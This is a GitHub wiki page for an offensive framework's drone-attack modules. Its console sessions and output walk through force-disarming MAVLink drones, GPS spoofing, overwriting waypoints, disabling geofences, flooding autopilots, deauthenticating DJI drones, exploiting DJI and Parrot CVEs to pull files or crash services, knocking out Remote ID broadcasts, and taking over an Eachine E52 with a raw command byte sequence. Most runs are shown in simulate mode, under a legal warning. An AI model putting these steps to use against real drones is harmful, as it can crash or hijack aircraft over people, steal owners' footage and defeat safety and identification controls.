-
Notifications
You must be signed in to change notification settings - Fork 2
Drone Security
André Henrique edited this page Jun 8, 2026
·
1 revision
Legal Warning: Unauthorized drone interference - deauth, disarm, GPS spoofing, command injection - violates aviation law in all jurisdictions. In many countries it constitutes a federal criminal offense with severe penalties. Use ONLY on drones you own, in RF-shielded environments, or under explicit written authorization from the drone owner and the relevant aviation authority.
| Module | Description |
|---|---|
drone_scanner |
Drone discovery by WiFi SSID fingerprint (DJI, Parrot, Holy Stone, FPV) |
mavlink/mavlink_scanner |
MAVLink device scanner on UDP 14550 / TCP 5760 |
mavlink/mavlink_force_disarm |
Force disarm command via MAV_CMD_COMPONENT_ARM_DISARM |
mavlink/mavlink_gps_spoof |
Inject spoofed GPS NMEA to ground station / GCS |
mavlink/mavlink_waypoint_inject |
Overwrite active mission waypoints |
mavlink/mavlink_geofence_disable |
Disable geofence parameters via PARAM_SET |
mavlink/mavlink_param_dump |
Dump all autopilot parameters (read-only audit) |
mavlink/mavlink_flood_dos |
MAVLink message flood DoS |
dji/dji_wifi_scan |
DJI drone SSID scanner and version extractor |
dji/dji_deauth |
DJI WiFi deauthentication (landing interruption) |
dji/dji_quicktransfer_exfil_cve_2023_6951 |
CVE-2023-6951 - DJI QuickTransfer unauthenticated file exfil |
parrot/parrot_anafi_deauth_cve_2019_3944 |
CVE-2019-3944 - Parrot ANAFI WiFi deauth |
parrot/parrot_anafi_webcrash_cve_2019_3945 |
CVE-2019-3945 - Parrot ANAFI REST API crash |
parrot/parrot_anafi_udp_cmd_inject |
Parrot ANAFI UDP command injection |
parrot/parrot_bebop_dhcp_exhaust_cve_2022_46416 |
CVE-2022-46416 - Parrot Bebop DHCP pool exhaustion |
holystone/hsrid01_ble_dos_cve_2024_52876 |
CVE-2024-52876 - Holy Stone HSRID01 BLE DoS |
fpv/eachine_e52_tcp_takeover |
Eachine E52 TCP replay takeover |
Most consumer drones broadcast identifiable SSIDs. The drone_scanner module passively identifies drones by SSID patterns.
wxf > use generic/drones/drone_scanner
wxf (DroneScanner) > set INTERFACE wlan0mon
wxf (DroneScanner) > run
[*] Passive drone discovery on wlan0mon...
[*] Scanning all channels...
[+] DJI Mavic Mini 2 | SSID: MAVIC-MINI-2-3A5B | Ch 6 | RSSI: -52 | MAC: AA:BB:CC:11:22:33
Fingerprint: DJI WiFi AP (OUI: 60:60:1F)
Open for: dji_wifi_scan, dji_deauth
[+] Parrot ANAFI | SSID: ANAFI-E0F1 | Ch 11 | RSSI: -67 | MAC: 90:03:B7:44:55:66
Fingerprint: Parrot drone (OUI: 90:03:B7)
Open for: parrot_anafi_deauth_cve_2019_3944, parrot_anafi_webcrash_cve_2019_3945
[+] Unknown FPV | SSID: WIFI-FPV-CAM | Ch 1 | RSSI: -71 | MAC: DC:71:96:77:88:99
Fingerprint: FPV camera controller (OUI: DC:71:96)
[*] Scan complete: 3 drones found
MAVLink is the open protocol used by ArduPilot, PX4, and many commercial drones. It runs over UDP port 14550 or TCP port 5760 with no authentication by default.
wxf > use generic/drones/mavlink/mavlink_scanner
wxf (MAVLinkScanner) > set TARGET_CIDR 192.168.1.0/24
wxf (MAVLinkScanner) > run
[*] Scanning 192.168.1.0/24 for MAVLink endpoints...
[+] 192.168.1.100:14550/UDP | System ID: 1 | Component: Autopilot
Firmware: ArduCopter 4.3.7
Modes available: STABILIZE, ALT_HOLD, AUTO, GUIDED, LOITER, RTL, LAND
Heartbeat rate: 1 Hz
[+] 192.168.1.101:5760/TCP | System ID: 255 | Component: GCS
Software: Mission Planner 1.3.80
[*] Scan complete: 2 MAVLink endpoints found
wxf > use generic/drones/mavlink/mavlink_force_disarm
wxf (MAVForceDisarm) > set RHOST 192.168.1.100
wxf (MAVForceDisarm) > set RPORT 14550
wxf (MAVForceDisarm) > set SIMULATE true
wxf (MAVForceDisarm) > run
[SIMULATE] Would send MAV_CMD_COMPONENT_ARM_DISARM
[SIMULATE] param1=0 (disarm) | param2=21196 (force flag)
[SIMULATE] Target: udp://192.168.1.100:14550 sysid=1 compid=1
[SIMULATE] MAVLink v2 message (signed: no)
[!] Set SIMULATE=false to send live command
[!] PREREQ: Network access to drone on UDP 14550
[!] WARNING: Force disarm on an airborne drone causes immediate crash
wxf > use generic/drones/mavlink/mavlink_gps_spoof
wxf (MAVGPSSpoof) > set RHOST 192.168.1.100
wxf (MAVGPSSpoof) > set LAT -23.5505
wxf (MAVGPSSpoof) > set LON -46.6333
wxf (MAVGPSSpoof) > set ALT 100.0
wxf (MAVGPSSpoof) > set SIMULATE true
wxf (MAVGPSSpoof) > run
[SIMULATE] MAVLink GPS override injection
[SIMULATE] Target: udp://192.168.1.100:14550
[SIMULATE] Spoofed position: -23.550500, -46.633300 alt=100.0m
[SIMULATE] Message: GLOBAL_POSITION_INT / HIL_GPS
[SIMULATE] Would send continuously at 5 Hz until Ctrl+C
[!] GPS spoofing may trigger geofence violation or RTL
[!] Set SIMULATE=false to inject
wxf > use generic/drones/mavlink/mavlink_waypoint_inject
wxf (MAVWaypointInject) > set RHOST 192.168.1.100
wxf (MAVWaypointInject) > set WAYPOINTS [{"lat": -23.5, "lon": -46.6, "alt": 50}]
wxf (MAVWaypointInject) > set SIMULATE true
wxf (MAVWaypointInject) > run
[SIMULATE] MAVLink mission upload
[SIMULATE] Clearing current mission (MISSION_CLEAR_ALL)
[SIMULATE] Uploading 1 waypoints
[SIMULATE] WP0: LAT=-23.5, LON=-46.6, ALT=50m, action=WAYPOINT
[!] Set SIMULATE=false to upload mission
wxf > use generic/drones/mavlink/mavlink_geofence_disable
wxf (MAVGeofenceDisable) > set RHOST 192.168.1.100
wxf (MAVGeofenceDisable) > set SIMULATE true
wxf (MAVGeofenceDisable) > run
[SIMULATE] PARAM_SET FENCE_ENABLE = 0 to 192.168.1.100:14550
[SIMULATE] Geofence disabled: drone can fly outside programmed boundaries
[!] Set SIMULATE=false to send live parameter set
wxf > use generic/drones/mavlink/mavlink_param_dump
wxf (MAVParamDump) > set RHOST 192.168.1.100
wxf (MAVParamDump) > set OUTPUT_FILE /tmp/mavlink_params.json
wxf (MAVParamDump) > run
[*] Requesting all autopilot parameters from 192.168.1.100:14550...
[+] ARMING_CHECK = 1
[+] FENCE_ENABLE = 1
[+] FENCE_TYPE = 7 (circle+polygon+alt)
[+] FENCE_ACTION = 1 (RTL on breach)
[+] GPS_TYPE = 1
[+] LOG_BITMASK = 176126
[+] SYSID_MYGCS = 255
...
[*] 847 parameters retrieved.
[+] Saved to /tmp/mavlink_params.json
wxf > use generic/drones/mavlink/mavlink_flood_dos
wxf (MAVFloodDoS) > set RHOST 192.168.1.100
wxf (MAVFloodDoS) > set RPORT 14550
wxf (MAVFloodDoS) > set RATE 1000
wxf (MAVFloodDoS) > set SIMULATE true
wxf (MAVFloodDoS) > run
[SIMULATE] MAVLink UDP flood: 1000 msg/s to 192.168.1.100:14550
[SIMULATE] Message types: HEARTBEAT, REQUEST_DATA_STREAM, COMMAND_LONG
[SIMULATE] Expected effect: autopilot CPU overload, telemetry blackout
[!] Set SIMULATE=false to run
wxf > use generic/drones/dji/dji_wifi_scan
wxf (DJIWifiScan) > set INTERFACE wlan0mon
wxf (DJIWifiScan) > run
[*] Scanning for DJI drone SSIDs...
[+] Found: MAVIC-MINI-2-3A5B | MAC: 60:60:1F:AA:BB:CC | Ch 6 | RSSI: -52
DJI OUI: 60:60:1F (confirmed)
SSID pattern: MAVIC-MINI-2 -> model: Mavic Mini 2
Firmware estimate: v01.00.0300+ (from beacon IE)
AP password: not set (open network)
[*] Scan complete. 1 DJI drone found.
wxf > use generic/drones/dji/dji_deauth
wxf (DJIDeauth) > set INTERFACE wlan0mon
wxf (DJIDeauth) > set TARGET_BSSID 60:60:1F:AA:BB:CC
wxf (DJIDeauth) > set COUNT 10
wxf (DJIDeauth) > set SIMULATE true
wxf (DJIDeauth) > run
[SIMULATE] Sending 10 deauth frames to 60:60:1F:AA:BB:CC
[SIMULATE] Source: spoofed BSSID | Reason: 0x07 (class 3 frame from nonassoc STA)
[SIMULATE] Effect: RC/app disconnects from drone WiFi -> failsafe RTL or hover
[!] Set SIMULATE=false to transmit
[!] PREREQ: Monitor mode interface (wlan0mon)
wxf > use generic/drones/dji/dji_quicktransfer_exfil_cve_2023_6951
wxf (DJIQuickTransferExfil) > show info
Name: DJI QuickTransfer Unauthenticated File Exfil
CVE: CVE-2023-6951
CVSS: 7.5 (High)
Target: DJI Mini 3 Pro, DJI Air 3, DJI RC-N1, DJI RC 2
Auth: None required (open WiFi AP)
Status: Patched in DJI firmware update 01.01.0200+
Description:
DJI QuickTransfer mode exposes an HTTP file server with no authentication.
An attacker associated to the drone WiFi AP can enumerate and download
all media files from /DCIM/ without pairing or authentication.
wxf (DJIQuickTransferExfil) > set RHOST 192.168.2.1
wxf (DJIQuickTransferExfil) > set OUTPUT_DIR /tmp/dji_exfil
wxf (DJIQuickTransferExfil) > set SIMULATE true
wxf (DJIQuickTransferExfil) > run
[SIMULATE] CVE-2023-6951: DJI QuickTransfer unauthenticated file access
[SIMULATE] Target: http://192.168.2.1:80
[SIMULATE] Enumerating /DCIM/...
[SIMULATE] Found: DJI_0001.MP4 (4.2 GB)
[SIMULATE] Found: DJI_0002.JPG (18 MB)
[SIMULATE] Found: DJI_0003.JPG (17 MB)
[SIMULATE] Total: 3 files, ~4.2 GB
[SIMULATE] Would download to /tmp/dji_exfil/
[!] Set SIMULATE=false - requires WiFi association to DJI drone
[!] NOTE: Drone must be in QuickTransfer mode (enabled via DJI RC screen)
wxf > use generic/drones/parrot/parrot_anafi_deauth_cve_2019_3944
wxf (ParrotANAFIDeauth) > show info
Name: Parrot ANAFI WiFi Deauthentication
CVE: CVE-2019-3944
CVSS: 6.5 (Medium)
Target: Parrot ANAFI (firmware <= 1.6.5)
Auth: None required (attacker must be in WiFi range)
Description:
The ANAFI drone WiFi network rejects deauth frames but a crafted
management frame sequence causes the onboard Linux AP to crash,
disconnecting the RC and triggering autonomous landing.
wxf (ParrotANAFIDeauth) > set INTERFACE wlan0mon
wxf (ParrotANAFIDeauth) > set TARGET_BSSID 90:03:B7:44:55:66
wxf (ParrotANAFIDeauth) > set SIMULATE true
wxf (ParrotANAFIDeauth) > run
[SIMULATE] CVE-2019-3944: Parrot ANAFI deauth sequence
[SIMULATE] Sending crafted management frames to 90:03:B7:44:55:66
[SIMULATE] Expected: AP WiFi daemon crashes, drone enters autonomous landing
[!] Set SIMULATE=false to transmit
wxf > use generic/drones/parrot/parrot_anafi_webcrash_cve_2019_3945
wxf (ParrotANAFIWebCrash) > set RHOST 192.168.42.1
wxf (ParrotANAFIWebCrash) > set SIMULATE true
wxf (ParrotANAFIWebCrash) > run
[SIMULATE] CVE-2019-3945: Parrot ANAFI REST API crash
[SIMULATE] Target: http://192.168.42.1/api/v1/
[SIMULATE] Sending malformed HTTP request to crash httpd on drone
[SIMULATE] Effect: drone REST API becomes unavailable, controller loses telemetry
[!] Set SIMULATE=false - requires WiFi association to Parrot ANAFI network
wxf > use generic/drones/parrot/parrot_bebop_dhcp_exhaust_cve_2022_46416
wxf (ParrotBebopDHCP) > show info
CVE: CVE-2022-46416
CVSS: 7.5 (High)
Target: Parrot Bebop 2 (all firmware)
Effect: DHCP pool exhaustion - legitimate RC cannot obtain IP, loses control
wxf (ParrotBebopDHCP) > set INTERFACE wlan0
wxf (ParrotBebopDHCP) > set SIMULATE true
wxf (ParrotBebopDHCP) > run
[SIMULATE] CVE-2022-46416: Parrot Bebop DHCP exhaustion
[SIMULATE] Sending DHCPDISCOVER with randomized MAC addresses
[SIMULATE] Bebop DHCP pool: /28 (14 hosts) - exhaust in ~14 requests
[SIMULATE] Effect: legitimate RC cannot join network, drone loses control link
[!] Set SIMULATE=false - requires WiFi association to Parrot Bebop network
wxf > use generic/drones/holystone/hsrid01_ble_dos_cve_2024_52876
wxf (HSRIDDoS) > show info
Name: Holy Stone HSRID01 BLE DoS
CVE: CVE-2024-52876
CVSS: 6.5 (Medium)
Target: Holy Stone HSRID01 drone ID module
Auth: None required (BLE range)
Description:
The HSRID01 Remote ID module broadcasts drone position via BLE.
A malformed BLE GATT write to the firmware update characteristic
causes the module to crash and stop broadcasting, violating
FAA/EASA Remote ID requirements.
wxf (HSRIDDoS) > set TARGET_MAC AA:BB:CC:DD:EE:FF
wxf (HSRIDDoS) > set SIMULATE true
wxf (HSRIDDoS) > run
[SIMULATE] CVE-2024-52876: HSRID01 BLE DoS
[SIMULATE] Target: AA:BB:CC:DD:EE:FF (Holy Stone HSRID01)
[SIMULATE] Connecting via BLE GATT...
[SIMULATE] Writing malformed payload to firmware characteristic 0xFF01
[SIMULATE] Expected: module crashes, Remote ID broadcast stops
[!] Set SIMULATE=false - requires BLE adapter (BlueZ)
wxf > use generic/drones/fpv/eachine_e52_tcp_takeover
wxf (EachineE52) > show info
Name: Eachine E52 TCP Replay Takeover
Target: Eachine E52 (and clones with same firmware)
Auth: None required (drone WiFi open)
Description:
The Eachine E52 uses an unencrypted, unauthenticated TCP control protocol
on port 8080. By replaying captured command sequences, an attacker can
take full control of the drone including takeoff, landing, and direction.
wxf (EachineE52) > set RHOST 192.168.1.1
wxf (EachineE52) > set COMMAND land
wxf (EachineE52) > set SIMULATE true
wxf (EachineE52) > run
[SIMULATE] Eachine E52 TCP command injection
[SIMULATE] Target: tcp://192.168.1.1:8080
[SIMULATE] Command: LAND (byte sequence: 66 05 04 00 00 00 00 00 68)
[SIMULATE] No authentication required - any device on the drone WiFi can send commands
[!] Set SIMULATE=false - requires WiFi association to E52 AP (SSID: WIFI-FPV-XXXX)
Related pages: Sub-GHz Attacks | Maritime Security | Wi-Fi Attacks
Author: Andre Henrique (@mrhenrike) | Uniao Geek
Primeiros Passos
Ataques Wireless
Drones e UAV
Protocolos Especializados
Ferramentas de Pentest
Hardware